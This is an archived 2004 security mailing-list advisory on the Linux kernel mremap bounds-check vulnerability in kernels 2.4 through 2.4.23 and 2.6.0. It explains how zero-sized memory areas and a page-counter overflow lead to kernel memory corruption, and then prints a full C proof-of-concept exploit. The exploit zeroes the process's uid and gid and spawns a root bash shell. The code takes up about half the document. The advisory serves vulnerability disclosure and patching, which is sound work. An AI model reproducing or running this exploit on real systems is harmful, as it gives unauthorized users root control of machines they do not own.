[UNIX] Linux Kernel do_mremap Local Privilege Escalation Vulnerability (Technical Details)

From: SecuriTeam (support_at_securiteam.com)
Date: 01/15/04

  • Next message: SecuriTeam: "[NT] RapidCache Multiple Vulnerabilities"
    To: list@securiteam.com
    Date: 15 Jan 2004 18:09:40 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Linux Kernel do_mremap Local Privilege Escalation Vulnerability (Technical
    Details)
    ------------------------------------------------------------------------

    SUMMARY

    A critical security vulnerability has been found in the Linux kernel
    memory management code in mremap(2) system call due to incorrect bound
    checks. The following advisory will try to shed more light into the issue,
    and provide a more accurate means of testing this vulnerability (via an
    exploit).

    DETAILS

    Vulnerable systems:
     * Linux kernel 2.4 up to 2.4.23 and 2.6.0

    The mremap system call provides functionality of resizing (shrinking or
    growing) as well as moving across process's addressable space of existing
    virtual memory areas (VMAs) or any of its parts.

    A typical VMA covers at least one memory page (which is exactly 4kB on the
    i386 architecture). An incorrect bound check discovered inside the
    do_mremap() kernel code performing remapping of a virtual memory area may
    lead to creation of a virtual memory area of 0 bytes in length.

    The problem bases on the general mremap flaw that remapping of 2 pages
    from inside a VMA creates a memory hole of only one page in length but
    also an additional VMA of two pages. In the case of a zero sized remapping
    request no VMA hole is created but an additional VMA descriptor of 0 bytes
    in length is created.

    Such a malicious virtual memory area may disrupt the operation of the
    other parts of the kernel memory management subroutines finally leading to
    unexpected behavior.

    A typical process's memory layout showing invalid VMA created with mremap
    system call:

        08048000-0804c000 r-xp 00000000 03:05 959142 /tmp/test
        0804c000-0804d000 rw-p 00003000 03:05 959142 /tmp/test
        0804d000-0804e000 rwxp 00000000 00:00 0
        40000000-40014000 r-xp 00000000 03:05 1544523 /lib/ld-2.3.2.so
        40014000-40015000 rw-p 00013000 03:05 1544523 /lib/ld-2.3.2.so
        40015000-40016000 rw-p 00000000 00:00 0
        4002c000-40158000 r-xp 00000000 03:05 1544529 /lib/libc.so.6
        40158000-4015d000 rw-p 0012b000 03:05 1544529 /lib/libc.so.6
        4015d000-4015f000 rw-p 00000000 00:00 0
    [*] 60000000-60000000 rwxp 00000000 00:00 0
        bfffe000-c0000000 rwxp fffff000 00:00 0

    The broken VMA in the above example has been marked with a [*].

    Exploitation:
    The iSEC team has identified multiple attack vectors for the bug
    discovered. In this section, we want to describe the page counter method
    however, we strongly believe that a much faster and more convenient method
    exists.

    As mentioned above a VMA of 0 bytes in size can be introduced into the
    process's virtual memory list. Its unusual size renders such a VMA
    partially invisible to the kernel main VM helper routine called
    find_vma(). The find_vma(ADDR) function returns the first VMA descriptor
    (START, END) from the current process's list satysfying ADDR < END or NULL
    if none. Obviously, given a VMA starting and ending at the same address
    ADDR the condition is violated if one searches for ADDR's VMA thus the
    next VMA in the list will be returned.

    The mremap() code calls the insert_vm_struct() helper function after
    creating the bogus VMA descriptor in kernel memory which in turn checks
    the new location calling the find_vma() helper which returns the wrong
    result if a zero sized VMA is already present in the new location.
    Therefore, it is possible to introduce multiple bogus VMA descriptors for
    the same virtual memory address. This happens only if the adjacent zero
    sized VMAs differ in their descriptor flags because otherwise they will be
    linked together in insert_vm_struct().

    Later the process virtual memory list could look like:

        08048000-080a2000 r-xp 00000000 03:02 53159 /tmp/test
        080a2000-080a5000 rw-p 00059000 03:02 53159 /tmp/test
        080a5000-080a6000 rwxp 00000000 00:00 0
        40000000-40001000 r--p 00000000 00:00 0
        60000000-60000000 r--p 00000000 00:00 0
        60000000-60000000 rw-p 00000000 00:00 0
        60000000-60000000 r--p 00000000 00:00 0
        60000000-60001000 rwxp 00000000 00:00 0
        bffff000-c0000000 rwxp 00000000 00:00 0

    Further we have found that there is an off-by-one increment inside the
    copy_page_range() function for the page counter of the first VMA page
    directly following a zero sized VMA area. This is not a bug in the
    copy_page_range code(), it is just a feature for a combined zero and
    non-zero VMA. The copy_page_range function is called on fork() to copy
    parent's page tables into the child process.

    Moreover, we must note that it is possible to remove a zero-sized VMA from
    the virtual memory list if another suitable VMA is mapped directly below
    the starting address of the 0-VMA. Suitable means that the new VMA must
    have exactly the same attributes (read, exec, etc) as the following
    zero-sized VMA and do not map a file. This again is a feature of the
    mmap() system call which will try to minimize the number of used VMA
    descriptors merging them if possible. Note that merging the VMAs does not
    influence any page counters in following VMAs.

    Combining the findings above we conclude that it is possible to
    arbitrarily increment the page counter of the first VMA page by forking
    more and more a process with a zero-sized VMA 'sandwich'. Cleanup must be
    done in the child before it can exit() otherwise the kernel would print a
    nasty error message while trying to remove the bogus VMA mappings.

    The goal is to overflow the page counter to become 1 again in the child
    process. If the corresponding VMA is unmapped now, the page counter will
    become 0 and the page returned to the kernel memory management. Note that
    the parent will still hold a reference to the freed page in its page table
    thus making a manipulation of kernel memory possible.

    Let us take a closer look at the incrementing of the page counter. We can
    introduce M (marked with A's and B's) 0-sized VMAs directly before the
    victim VMA hosting the page we want the counter to overflow. If the victim
    maps anonymous memory, the first write access to the victim VMA page
    (marked with P) will allocate and insert a fresh page frame into the
    process's page table and the page counter will be set to 1:

    [A][B][A][B] ... [A][P VICTIM ]

    After the first fork() P's page counter will become 1 + M + 1 where the
    first one is for the original copy in the parent, M for the bogus VMAs and
    one for the copy in the child. Cleaning up the 0-VMAs in the child will
    not change the page counter however, it will be decremented by one on
    child's exit. Thus after the first fork()-exit() pair it will become 1 +
    M. We can conclude for N forks taking integer overflows into account that
    without the final exit() call in the child following equation holds:

    1 + M*N + 1 = 1

    Or that

    M*N = 2^32-1 = 3 * 5 * 17 * 257 * 65537

    Thus we can for example choose to create (3*5*257) 0-sized VMAs and fork
    the parent (17*65537) times to overflow P's page counter. This may be a
    quite longish task. Times ranging from about one hour on a fast machine to
    more than 10 hours have been observed.

    Further exploitation proves to be easy because the kernel page management
    has the nice property to use a kind of reversed LRU policy for page
    allocation. That means that if a page has been released to the kernel MM
    subsystem it will be returned on a subsequent allocation request. The
    released page could be for example allocated to a file mapping we can
    normally only read from or to kernel structures, etc.

    It is worth noting that the parent's page reference (PTE) must be
    unprotected before we can use it to modify page contents because fork()
    will mark it as read only (for copy-on-write reasons).

    Impact:
    Since no special privileges are required to use the mremap(2) system call
    any process may misuse its unexpected behavior to disrupt the kernel
    memory management subsystem. Proper exploitation of this vulnerability may
    lead to local privilege escalation including execution of arbitrary code
    with kernel level access. Proof-of-concept exploit code has been created
    and successfully tested giving UID 0 shell on vulnerable systems.

    All users are encouraged to patch all vulnerable systems as soon as
    appropriate vendor patches are released.

    Exploit:
    /*
     * Linux kernel mremap() bound checking bug exploit.
     *
     * Bug found by Paul Starzetz <paul@isec.pl>
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
     * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
     * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <syscall.h>
    #include <signal.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/wait.h>

    #include <asm/page.h>

    #define MREMAP_MAYMOVE 1
    #define MREMAP_FIXED 2

    #define str(s) #s
    #define xstr(s) str(s)

    #define DSIGNAL SIGCHLD
    #define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
    #define PAGEADDR 0x2000

    #define RNDINT 512

    #define NUMVMA (3 * 5 * 257)
    #define NUMFORK (17 * 65537)

    #define DUPTO 1000
    #define TMPLEN 256

    #define __NR_sys_mremap 163

    _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
    ulong, e);
    unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
    unsigned long new_len,
           unsigned long flags, unsigned long new_addr);

    static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy =
    0, uid, gid;
    static volatile int *vma_ro, *vma_rw, *tmp;
    static volatile unsigned fake_file[16];

    void fatal(const char * msg)
    {
      printf("\n");
      if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
      } else {
        perror(msg);
      }

      printf("\nentering endless loop");
      fflush(stdout);
      fflush(stderr);
      while (1) pause();
    }

    void kernel_code(void * file, loff_t offset, int origin)
    {
      int i, c;
      int *v;

      if (!file)
        goto out;

      __asm__("movl %%esp, %0" : : "m" (c));

      c &= 0xffffe000;
      v = (void *) c;

      for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
        if (v[i] == uid && v[i+1] == uid) {
          i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
        }
        if (v[i] == gid) {
          v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
          break;
        }
      }
    out:
      dummy++;
    }

    void try_to_exploit(void)
    {
      int v = 0;

      v += fops[0];
      v += fake_file[0];

      kernel_code(0, 0, v);
      lseek(DUPTO, 0, SEEK_SET);

      if (geteuid()) {
        printf("\nFAILED uid!=0"); fflush(stdout);
        errno =- ENOSYS;
        fatal("uid change");
      }

      printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

      kill(ppid, SIGUSR1);
      setresuid(0, 0, 0);
      sleep(1);

      printf("\n\n"); fflush(stdout);

      execl("/bin/bash", "bash", NULL);
      fatal("burp");
    }

    void cleanup(int v)
    {
      victim[DUPTO] = victim[0];
      kill(0, SIGUSR2);
    }

    void redirect_filp(int v)
    {
      printf("\n[!] parent check race... "); fflush(stdout);

      if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
        printf("SUCCESS, cought SLAB page!"); fflush(stdout);
        victim[DUPTO] = (unsigned) & fake_file;
        signal(SIGUSR1, &cleanup);
        kill(pid, SIGUSR1);
      } else {
        printf("FAILED!");
      }
      fflush(stdout);
    }

    int get_slab_objs(void)
    {
      FILE * fp;
      int c, d, u = 0, a = 0;
      static char line[TMPLEN], name[TMPLEN];

      fp = fopen("/proc/slabinfo", "r");
      if (!fp)
        fatal("fopen");

      fgets(name, sizeof(name) - 1, fp);
      do {
        c = u = a =- 1;
        if (!fgets(line, sizeof(line) - 1, fp))
          break;
        c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d,
    &d);
      } while (strcmp(name, "size-4096"));
      
      fclose(fp);

      return c == 7 ? a - u : -1;
    }

    void unprotect(int v)
    {
      int n, c = 1;

      *victim = 0;
      printf("\n[+] parent unprotected PTE "); fflush(stdout);

      dup2(0, 2);
      while (1) {
        n = get_slab_objs();
        if (n < 0)
          fatal("read slabinfo");
        if (n > 0) {
          printf("\n depopulate SLAB #%d", c++);
          blah = 0; kill(hpid, SIGUSR1);
          while (!blah) pause();
        }
        if (!n) {
          blah = 0; kill(hpid, SIGUSR1);
          while (!blah) pause();
          dup2(0, DUPTO);
          break;
        }
      }

      signal(SIGUSR1, &redirect_filp);
      kill(pid, SIGUSR1);
    }

    void cleanup_vmas(void)
    {
      int i = NUMVMA;

      while (1) {
        tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
        if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
          printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
          fatal("unmap1");
        }
        i--;
        if (!i)
          break;

        tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE,
    PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
        if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
          printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
          fatal("unmap2");
        }
        i--;
        if (!i)
          break;
      }
    }

    void catchme(int v)
    {
      blah++;
    }

    void exitme(int v)
    {
      _exit(0);
    }

    void childrip(int v)
    {
      waitpid(-1, 0, WNOHANG);
    }

    void slab_helper(void)
    {
      signal(SIGUSR1, &catchme);
      signal(SIGUSR2, &exitme);
      blah = 0;

      while (1) {
        while (!blah) pause();

        blah = 0;
        if (!fork()) {
          dup2(0, DUPTO);
          kill(getppid(), SIGUSR1);
          while (1) pause();
        } else {
          while (!blah) pause();
          blah = 0; kill(ppid, SIGUSR2);
        }
      }
      exit(0);
    }

    int main(void)
    {
      int i, r, v, cnt;
      time_t start;

      srand(time(NULL) + getpid());
      ppid = getpid();
      uid = getuid();
      gid = getgid();

      hpid = fork();
      if (!hpid)
        slab_helper();

      fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
          MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (fops == MAP_FAILED)
        fatal("mmap fops VMA");
      for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
        fops[i] = (unsigned)&kernel_code;
      for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
        fake_file[i] = (unsigned)fops;

      vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (vma_ro == MAP_FAILED)
        fatal("mmap1");

      vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE,
    MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (vma_rw == MAP_FAILED)
        fatal("mmap2");

      cnt = NUMVMA;
      while (1) {
        r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE,
    PAGEADDR);
        if (r == (-1)) {
          printf("\n[-] ERROR remapping"); fflush(stdout);
          fatal("remap1");
        }
        cnt--;
        if (!cnt) break;

        r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE,
    PAGEADDR);
        if (r == (-1)) {
          printf("\n[-] ERROR remapping"); fflush(stdout);
          fatal("remap2");
        }
        cnt--;
        if (!cnt) break;
      }

      victim = mmap((void*)PAGEADDR, PAGE_SIZE,
    PROT_EXEC|PROT_READ|PROT_WRITE,
          MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (victim != (void *) PAGEADDR)
        fatal("mmap victim VMA");

      v = *victim;
      *victim = v + 1;

      signal(SIGUSR1, &unprotect);
      signal(SIGUSR2, &catchme);
      signal(SIGCHLD, &childrip);
      printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
      start = time(NULL);

      cnt = NUMFORK;
      v = 0;
      while (1) {
        cnt--;
        v--;
        dummy += *victim;

        if (cnt > 1) {
          __asm__(
          "pusha \n"
          "movl %1, %%eax \n"
          "movl $("xstr(CLONEFL)"), %%ebx \n"
          "movl %%esp, %%ecx \n"
          "movl $120, %%eax \n"
          "int $0x80 \n"
          "movl %%eax, %0 \n"
          "popa \n"
          : : "m" (pid), "m" (dummy)
          );
        } else {
          pid = fork();
        }

        if (pid) {
          if (v <= 0 && cnt > 0) {
            float eta, tm;
            v = rand() % RNDINT / 2 + RNDINT / 2;
            tm = eta = (float)(time(NULL) - start);
            eta *= (float)NUMFORK;
            eta /= (float)(NUMFORK - cnt);
            printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ",
            NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta -
    tm);
            fflush(stdout);
          }
          if (cnt) {
            waitpid(pid, 0, 0);
            continue;
          }
          if (!cnt) {
            while (1) {
               r = wait(NULL);
               if (r == pid) {
                 cleanup_vmas();
                while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
               }
            }
          }
        }

        else {
          cleanup_vmas();

          if (cnt > 0) {
            _exit(0);
          }

          printf("\n[+] overflow done, the moment of truth...");
    fflush(stdout);
          sleep(1);

          signal(SIGUSR1, &catchme);
          munmap(0, PAGE_SIZE);
          dup2(0, 2);
          blah = 0; kill(ppid, SIGUSR1);
          while (!blah) pause();

          munmap((void *)victim, PAGE_SIZE);
          dup2(0, DUPTO);

          blah = 0; kill(ppid, SIGUSR1);
          while (!blah) pause();
          try_to_exploit();
          while (1) pause();
        }
      }
      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ihaquer@isec.pl> Paul
    Starzetz.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] RapidCache Multiple Vulnerabilities"

    Relevant Pages